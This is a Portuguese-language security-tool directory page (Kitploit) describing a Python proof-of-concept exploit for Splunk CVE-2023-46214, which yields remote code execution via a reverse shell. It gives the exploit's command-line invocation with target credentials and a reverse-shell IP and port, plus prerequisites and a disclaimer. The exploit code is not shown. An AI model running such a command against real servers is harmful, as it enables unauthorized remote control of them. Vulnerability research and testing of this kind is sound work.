Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Splunk-RCE-poc — PoC baseado em Python para CVE-2023-46214 que explora o recurso adddatamethods do Splunk para alcançar execução remota de código por meio de uma reverse shell. | Kitploit
Ferramentas/GitHubGitHub/nathan31337/splunk-rce-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoRed Teaming
GitHubnathan31337/splunk-rce-poc

Splunk-RCE-poc

PoC baseado em Python para CVE-2023-46214 que explora o recurso adddatamethods do Splunk para alcançar execução remota de código por meio de uma reverse shell.

Ver Repositório
11423há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Splunk RCE - PoC

Prova de conceito de exploit para CVE-2023-46214, SVD-2023-1104

poc

Uso

A URL da instância do Splunk, o nome de usuário, a senha, o IP do shell reverso e a porta são todos obrigatórios como parâmetros de linha de comando. Por exemplo:

root@kitploit:~
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>

Pré-requisitos

  • Credenciais do Splunk com permissão de upload para adddatamethods
    • Nota: outro vetor pode ser possível, este é apenas o que usei
  • O Splunk não está rodando em modo SHC

Análise

Escrevi um post no blog detalhando a metodologia utilizada para descobrir esta vulnerabilidade. Se você estiver encontrando algum problema com o script, o blog pode ser útil, pois detalha as etapas manuais para a exploração.

Analysis of CVE-2023-46214 + PoC

Aviso Legal

O script de Prova de Conceito (PoC) fornecido neste repositório serve unicamente para objetivos educacionais e de pesquisa. Seu propósito é demonstrar uma vulnerabilidade específica e auxiliar na compreensão dos riscos de segurança associados.

Qualquer uso deste script para atividades não autorizadas, incluindo, mas não se limitando a acesso não autorizado a sistemas, testes não autorizados ou outras formas de uso indevido, é inequivocamente proibido.

Os criadores e contribuidores deste repositório se isentam de toda responsabilidade pelo uso impróprio ou por qualquer dano ou prejuízo resultante do uso deste script. Ao utilizar este script, você concorda em usá-lo de forma responsável e por sua conta e risco.

Baixar ferramenta